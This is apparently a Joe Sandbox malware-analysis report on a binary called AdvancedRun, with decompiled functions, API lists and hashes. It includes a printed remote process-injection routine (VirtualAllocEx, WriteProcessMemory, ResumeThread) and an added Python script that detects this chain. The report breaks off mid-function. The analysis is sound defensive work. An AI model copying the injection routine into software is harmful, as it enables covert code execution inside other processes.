                                                                  				_t148 = _t147 + 0xc;
                                                                  				_t128 = GetModuleHandleW(L"kernel32.dll");
                                                                  				_v8 = 0;
                                                                  				E00409C70( &_v8);
                                                                  				_push("CreateProcessW");
                                                                  				_push(_t128);
                                                                  				if(_v8 == 0) {
                                                                  					_t84 = GetProcAddress();
                                                                  				} else {
                                                                  					_t84 = _v8();
                                                                  				}
                                                                  				_v33352 = _t84;
                                                                  				E00409C70( &_v8);
                                                                  				_push("GetLastError");
                                                                  				_push(_t128);
                                                                  				if(_v8 == 0) {
                                                                  					_t87 = GetProcAddress();
                                                                  				} else {
                                                                  					_t87 = _v8();
                                                                  				}
                                                                  				_t140 = _a28;
                                                                  				_v33348 = _t87;
                                                                  				if(_t140 != 0) {
                                                                  					_t126 = 0x11;
                                                                  					memcpy( &_v33420, _t140, _t126 << 2);
                                                                  					_t148 = _t148 + 0xc;
                                                                  				}
                                                                  				_v33420 = 0x44;
                                                                  				if(_a16 == 0) {
                                                                  					_v33336 = 1;
                                                                  				} else {
                                                                  					E00404923(0x2000,  &_v33336, _a16);
                                                                  				}
                                                                  				if(_a12 == 0) {
                                                                  					_v16950 = 1;
                                                                  				} else {
                                                                  					E00404923(0x2000,  &_v16950, _a12);
                                                                  				}
                                                                  				if(_a24 == 0) {
                                                                  					_v564 = 1;
                                                                  				} else {
                                                                  					E00404923(0x104,  &_v564, _a24);
                                                                  				}
                                                                  				_v24 = _a20;
                                                                  				_v28 = 0;
                                                                  				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
                                                                  				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
                                                                  				_a12 = _t90;
                                                                  				if(_a16 == 0 || _t90 == 0) {
                                                                  					 *_a4 = GetLastError();
                                                                  				} else {
                                                                  					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
                                                                  					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
                                                                  					_v20 = 0;
                                                                  					_v16 = 0;
                                                                  					_a24 = 0;
                                                                  					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
                                                                  					_a28 = _t144;
                                                                  					if(_t144 == 0) {
                                                                  						 *_a4 = GetLastError();
                                                                  					} else {
                                                                  						ResumeThread(_t144);
                                                                  						WaitForSingleObject(_t144, 0x7d0);
                                                                  						CloseHandle(_t144);
                                                                  					}
                                                                  					_v66852 = 0;
                                                                  					memset( &_v66848, 0, 0x8284);
                                                                  					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
                                                                  					VirtualFreeEx(_a8, _a16, 0, 0x8000);
                                                                  					VirtualFreeEx(_a8, _a12, 0, 0x8000);
                                                                  					if(_a28 != 0) {
                                                                  						 *_a4 = _v66756;
                                                                  						_v12 = _v66760;
                                                                  						if(_a32 != 0) {
                                                                  							asm("movsd");
                                                                  							asm("movsd");
                                                                  							asm("movsd");
                                                                  							asm("movsd");
                                                                  						}
                                                                  					}
                                                                  					if(_v20 != 0) {
                                                                  						FreeLibrary(_v20);
                                                                  					}
                                                                  				}
                                                                  				goto L30;
                                                                  			}

































                                                                  Instruction addresses of the decompiled lines above (one per line, 0x00000000 where no instruction maps): 0x0040a474 to 0x0040a700.

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                  • memset.MSVCRT ref: 0040A66E
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
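                                                                  Read as a chain rather than as isolated calls, the API list above is the textbook shape of code injection into another process: OpenProcess asks for 0x1F0FFF (PROCESS_ALL_ACCESS); VirtualAllocEx creates one 0x8288-byte region with protection 0x4 (PAGE_READWRITE) and one 0x800-byte region with 0x40 (PAGE_EXECUTE_READWRITE); WriteProcessMemory copies 0x800 bytes starting at 0x0040A3DC, an address inside the sample's own image, into the executable region and writes 0x8288 bytes into the other; ResumeThread releases a suspended thread, WaitForSingleObject waits up to 0x7D0 (2000 ms), ReadProcessMemory copies the 0x8288-byte region back, and both regions are released with VirtualFreeEx (0x8000 = MEM_RELEASE). CreateProcessW and GetLastError are resolved by name through GetProcAddress, which is why they do not show up as static imports. The Python script below is an added example and is not part of the Joe Sandbox output or of the analysed binary: it parses API lines in the layout shown on this page (the `Name.Module(args), ref: address` line shape is an assumption about the report format), decodes the access-mask and protection constants with their documented Windows values, and flags the chain. The trace lines embedded in it are copied from the list above, with the "Part of subcall function" lines left out.

```python
"""Decode constant arguments in a Joe Sandbox API-call list and flag the
remote-process code-injection chain. Added example for this report; it is
not part of the Joe Sandbox output or of the analysed binary."""
import re

# Documented Windows constants (winnt.h / memoryapi.h), not assumptions.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC",
    0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1F0FFF
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXECUTE_BITS = 0x10 | 0x20 | 0x40 | 0x80

# Copied from the API list of the function at 0x0040A474 in this report
# ("Part of subcall function" lines left out).
TRACE = """\
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
• GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
• VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
• VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
• WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
• WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
• ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
• WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
• ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
• VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
• GetLastError.KERNEL32 ref: 0040A6E4
"""

# Assumed report layout: "• Name.Module(args), ref: ADDR" or "• Name.Module ref: ADDR".
LINE_RE = re.compile(r"•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s+ref:\s*([0-9A-Fa-f]+)")


def parse_trace(text):
    """One dict per API line: name, module, raw args, parsed ints (None for '?' or names)."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        name, module, raw, ref = m.groups()
        args = [a.strip() for a in raw.split(",")] if raw else []
        ints = [int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else None for a in args]
        calls.append({"name": name, "module": module, "args": args,
                      "ints": ints, "ref": int(ref, 16)})
    return calls


def decode_mask(value, table):
    """Expand a bitmask into its named flags; leftover unknown bits are reported in hex."""
    names = [n for bit, n in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names


def assess(calls):
    """Score the injection chain: open the target with VM rights, allocate executable
    memory in it, write into it, then trigger execution (ResumeThread & co.)."""
    findings = []
    names = {c["name"] for c in calls}
    for c in calls:
        if c["name"] == "OpenProcess" and c["ints"] and c["ints"][0] is not None:
            access = c["ints"][0]
            if access == PROCESS_ALL_ACCESS:
                findings.append("OpenProcess requests PROCESS_ALL_ACCESS (0x1F0FFF)")
            elif access & 0x28:  # PROCESS_VM_OPERATION | PROCESS_VM_WRITE
                findings.append("OpenProcess requests " + "|".join(decode_mask(access, PROCESS_RIGHTS)))
        if c["name"] == "VirtualAllocEx" and len(c["ints"]) == 5 and c["ints"][4] is not None:
            size, prot = c["ints"][2], c["ints"][4]
            if prot & EXECUTE_BITS:
                findings.append(f"VirtualAllocEx of {size:#x} bytes with "
                                f"{'|'.join(decode_mask(prot, PAGE_PROTECT))} at {c['ref']:#010x}")
    if "WriteProcessMemory" in names:
        findings.append("WriteProcessMemory into the opened process")
    runners = names & {"ResumeThread", "CreateRemoteThread", "NtCreateThreadEx", "QueueUserAPC"}
    if runners:
        findings.append("execution trigger: " + ", ".join(sorted(runners)))
    injection = len(findings) >= 3 and "WriteProcessMemory" in names and bool(runners)
    return {"injection_pattern": injection, "findings": findings}


if __name__ == "__main__":
    result = assess(parse_trace(TRACE))
    for finding in result["findings"]:
        print("-", finding)
    print("remote code injection pattern:", result["injection_pattern"])
```

                                                                  The script keys on the combination, not on any single call: PROCESS_ALL_ACCESS alone is common in legitimate tooling, and an executable VirtualAllocEx without a write and a trigger is not actionable either. Note that the handle passed to ResumeThread is shown as 00000000 in the trace, so the thread it resumes is not visible here; the trigger is inferred from the call name only.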
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                  • API String ID: 1572607441-20550370
                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                  				struct tagPOINT _v12;
                                                                  				void* __esi;
                                                                  				void* _t47;
                                                                  				struct HBRUSH__* _t56;
                                                                  				void* _t61;
                                                                  				unsigned int _t63;
                                                                  				void* _t68;
                                                                  				struct HWND__* _t69;
                                                                  				struct HWND__* _t70;
                                                                  				void* _t73;
                                                                  				unsigned int _t74;
                                                                  				struct HWND__* _t76;
                                                                  				struct HWND__* _t77;
                                                                  				struct HWND__* _t78;
                                                                  				struct HWND__* _t79;
                                                                  				unsigned int _t85;
                                                                  				struct HWND__* _t87;
                                                                  				struct HWND__* _t89;
                                                                  				struct HWND__* _t90;
                                                                  				struct tagPOINT _t96;
                                                                  				struct tagPOINT _t98;
                                                                  				signed short _t103;
                                                                  				void* _t106;
                                                                  				void* _t117;
                                                                  
                                                                  				_t106 = __edx;
                                                                  				_push(__ecx);
                                                                  				_push(__ecx);
                                                                  				_t47 = _a4 - 0x110; // _a4 is the window message; 0x110 = WM_INITDIALOG
                                                                  				_t117 = __ecx;
                                                                  				if(_t47 == 0) {
                                                                  					__eflags =  *0x40feb0;
                                                                  					if(__eflags != 0) {
                                                                  						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                  					} else {
                                                                  						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                  						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                  					}
                                                                  					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                  					E0040103E(_t117, __eflags);
                                                                  					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                  					goto L30;
                                                                  				} else {
                                                                  					_t61 = _t47 - 1; // 0x111 = WM_COMMAND
                                                                  					if(_t61 == 0) {
                                                                  						_t103 = _a8;
                                                                  						_t63 = _t103 >> 0x10;
                                                                  						__eflags = _t103 - 1;
                                                                  						if(_t103 == 1) {
                                                                  							L24:
                                                                  							__eflags = _t63;
                                                                  							if(_t63 != 0) {
                                                                  								goto L30;
                                                                  							} else {
                                                                  								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff); // control ID 1 = IDOK, 2 = IDCANCEL
                                                                  								DeleteObject( *(_t117 + 0x43c));
                                                                  								goto L8;
                                                                  							}
                                                                  						} else {
                                                                  							__eflags = _t103 - 2;
                                                                  							if(_t103 != 2) {
                                                                  								goto L30;
                                                                  							} else {
                                                                  								goto L24;
                                                                  							}
                                                                  						}
                                                                  					} else {
                                                                  						_t68 = _t61 - 0x27; // 0x138 = WM_CTLCOLORSTATIC
                                                                  						if(_t68 == 0) {
                                                                  							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                  							__eflags = _a12 - _t69;
                                                                  							if(_a12 != _t69) {
                                                                  								__eflags =  *0x40ff30;
                                                                  								if( *0x40ff30 == 0) {
                                                                  									goto L30;
                                                                  								} else {
                                                                  									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                  									__eflags = _a12 - _t70;
                                                                  									if(_a12 != _t70) {
                                                                  										goto L30;
                                                                  									} else {
                                                                  										goto L18;
                                                                  									}
                                                                  								}
                                                                  							} else {
                                                                  								L18:
                                                                  								SetBkMode(_a8, 1);
                                                                  								SetTextColor(_a8, 0xc00000);
                                                                  								_t56 = GetSysColorBrush(0xf);
                                                                  							}
                                                                  						} else {
                                                                  							_t73 = _t68 - 0xc8; // 0x200 = WM_MOUSEMOVE
                                                                  							if(_t73 == 0) {
                                                                  								_t74 = _a12;
                                                                  								_t96 = _t74 & 0x0000ffff;
                                                                  								_v12.x = _t96;
                                                                  								_v12.y = _t74 >> 0x10;
                                                                  								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                  								_push(_v12.y);
                                                                  								_a8 = _t76;
                                                                  								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                  								__eflags = _t77 - _a8;
                                                                  								if(_t77 != _a8) {
                                                                  									__eflags =  *0x40ff30;
                                                                  									if( *0x40ff30 == 0) {
                                                                  										goto L30;
                                                                  									} else {
                                                                  										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                  										_push(_v12.y);
                                                                  										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                  										__eflags = _t79 - _t78;
                                                                  										if(_t79 != _t78) {
                                                                  											goto L30;
                                                                  										} else {
                                                                  											goto L13;
                                                                  										}
                                                                  									}
                                                                  								} else {
                                                                  									L13:
                                                                  									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
                                                                  									goto L8;
                                                                  								}
                                                                  							} else {
                                                                  								if(_t73 != 0) {
                                                                  									L30:
                                                                  									_t56 = 0;
                                                                  									__eflags = 0;
                                                                  								} else {
                                                                  									_t85 = _a12;
                                                                  									_t98 = _t85 & 0x0000ffff;
                                                                  									_v12.x = _t98;
                                                                  									_v12.y = _t85 >> 0x10;
                                                                  									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                  									_push(_v12.y);
                                                                  									_a8 = _t87;
                                                                  									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
                                                                  										__eflags =  *0x40ff30;
                                                                  										if( *0x40ff30 == 0) {
                                                                  											goto L30;
                                                                  										} else {
                                                                  											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                  											_push(_v12.y);
                                                                  											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
                                                                  											__eflags = _t90 - _t89;
                                                                  											if(_t90 != _t89) {
                                                                  												goto L30;
                                                                  											} else {
                                                                  												_push(0x40ff30);
                                                                  												goto L7;
                                                                  											}
                                                                  										}
                                                                  									} else {
                                                                  										_push(_t117 + 0x23e);
                                                                  										L7:
                                                                  										_push( *(_t117 + 0x10));
                                                                  										E00404F7E();
                                                                  										L8:
                                                                  										_t56 = 1;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t56;
                                                                  			}

                                                                  0x00401093
                                                                  0x00401096
                                                                  0x00401097
                                                                  0x0040109b
                                                                  0x004010a3
                                                                  0x004010a5
                                                                  0x00401270
                                                                  0x00401278
                                                                  0x004012b3
                                                                  0x0040127a
                                                                  0x00401293
                                                                  0x004012a2
                                                                  0x004012a2
                                                                  0x004012c1
                                                                  0x004012d9
                                                                  0x004012ea
                                                                  0x004012ec
                                                                  0x004012f6
                                                                  0x00000000
                                                                  0x004010ab
                                                                  0x004010ab
                                                                  0x004010ac
                                                                  0x00401231
                                                                  0x00401236
                                                                  0x00401239
                                                                  0x0040123d
                                                                  0x00401249
                                                                  0x00401249
                                                                  0x0040124c
                                                                  0x00000000
                                                                  0x00401252
                                                                  0x00401259
                                                                  0x00401265
                                                                  0x00000000
                                                                  0x00401265
                                                                  0x0040123f
                                                                  0x0040123f
                                                                  0x00401243
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00401243
                                                                  0x004010b2
                                                                  0x004010b2
                                                                  0x004010b5
                                                                  0x004011e1
                                                                  0x004011e3
                                                                  0x004011e6
                                                                  0x0040120e
                                                                  0x00401216
                                                                  0x00000000
                                                                  0x0040121c
                                                                  0x00401224
                                                                  0x00401226
                                                                  0x00401229
                                                                  0x00000000
                                                                  0x0040122f
                                                                  0x00000000
                                                                  0x0040122f
                                                                  0x00401229
                                                                  0x004011e8
                                                                  0x004011e8
                                                                  0x004011ed
                                                                  0x004011fb
                                                                  0x00401203
                                                                  0x00401203
                                                                  0x004010bb
                                                                  0x004010bb
                                                                  0x004010c0
                                                                  0x00401151
                                                                  0x0040115a
                                                                  0x00401168
                                                                  0x0040116b
                                                                  0x0040116e
                                                                  0x00401170
                                                                  0x00401173
                                                                  0x00401180
                                                                  0x00401182
                                                                  0x00401185
                                                                  0x004011a4
                                                                  0x004011ac
                                                                  0x00000000
                                                                  0x004011b2
                                                                  0x004011ba
                                                                  0x004011bc
                                                                  0x004011c7
                                                                  0x004011c9
                                                                  0x004011cb
                                                                  0x00000000
                                                                  0x004011d1
                                                                  0x00000000
                                                                  0x004011d1
                                                                  0x004011cb
                                                                  0x00401187
                                                                  0x00401187
                                                                  0x00401199
                                                                  0x00000000
                                                                  0x00401199
                                                                  0x004010c6
                                                                  0x004010c8
                                                                  0x004012fd
                                                                  0x004012fd
                                                                  0x004012fd
                                                                  0x004010ce
                                                                  0x004010ce
                                                                  0x004010d7
                                                                  0x004010e5
                                                                  0x004010e8
                                                                  0x004010eb
                                                                  0x004010ed
                                                                  0x004010f0
                                                                  0x00401102
                                                                  0x0040111d
                                                                  0x00401125
                                                                  0x00000000
                                                                  0x0040112b
                                                                  0x00401133
                                                                  0x00401135
                                                                  0x00401140
                                                                  0x00401142
                                                                  0x00401144
                                                                  0x00000000
                                                                  0x0040114a
                                                                  0x0040114a
                                                                  0x00000000
                                                                  0x0040114a
                                                                  0x00401144
                                                                  0x00401104
                                                                  0x0040110a
                                                                  0x0040110b
                                                                  0x0040110b
                                                                  0x0040110e
                                                                  0x00401115
                                                                  0x00401117
                                                                  0x00401117
                                                                  0x00401102
                                                                  0x004010c8
                                                                  0x004010c0
                                                                  0x004010b5
                                                                  0x004010ac
                                                                  0x00401303

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                  • String ID: AdvancedRun
                                                                  • API String ID: 829165378-481304740
                                                                  • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                  • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                  • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                  • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			// Resolves ntdll.dll exports (NtQuerySystemInformation, NtLoadDriver, NtOpenThread, ...) at runtime
                                                                  			// via GetProcAddress and caches the pointers in globals; see the APIs list below.
                                                                  			E00408E31() {
                                                                  				void* _t1;
                                                                  				struct HINSTANCE__* _t2;
                                                                  				_Unknown_base(*)()* _t14;
                                                                  
                                                                  				if( *0x41c4ac == 0) {
                                                                  					_t2 = GetModuleHandleW(L"ntdll.dll");
                                                                  					 *0x41c4ac = _t2;
                                                                  					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
                                                                  					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
                                                                  					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
                                                                  					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
                                                                  					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
                                                                  					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
                                                                  					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
                                                                  					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
                                                                  					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
                                                                  					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
                                                                  					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
                                                                  					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
                                                                  					 *0x41c4a8 = _t14;
                                                                  					return _t14;
                                                                  				}
                                                                  				return _t1;
                                                                  			}
                                                                  0x00408e38
                                                                  0x00408e44
                                                                  0x00408e56
                                                                  0x00408e68
                                                                  0x00408e7a
                                                                  0x00408e8c
                                                                  0x00408e9e
                                                                  0x00408eb0
                                                                  0x00408ec2
                                                                  0x00408ed4
                                                                  0x00408ee6
                                                                  0x00408ef8
                                                                  0x00408f0a
                                                                  0x00408f1c
                                                                  0x00408f21
                                                                  0x00408f23
                                                                  0x00000000
                                                                  0x00408f28
                                                                  0x00408f29

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                  • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                  • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                  • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                  • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                  • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                  • API String ID: 667068680-4280973841
                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 45%
                                                                  			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
                                                                  				void _v259;
                                                                  				void _v260;
                                                                  				void _v515;
                                                                  				void _v516;
                                                                  				char _v1048;
                                                                  				void _v1052;
                                                                  				void _v1056;
                                                                  				void _v1560;
                                                                  				long _v1580;
                                                                  				void _v3626;
                                                                  				char _v3628;
                                                                  				void _v5674;
                                                                  				char _v5676;
                                                                  				void _v9770;
                                                                  				short _v9772;
                                                                  				void* __edi;
                                                                  				void* _t45;
                                                                  				void* _t60;
                                                                  				int _t61;
                                                                  				int _t63;
                                                                  				int _t64;
                                                                  				long _t68;
                                                                  				struct HWND__* _t94;
                                                                  				signed int _t103;
                                                                  				intOrPtr _t127;
                                                                  				unsigned int _t130;
                                                                  				void* _t132;
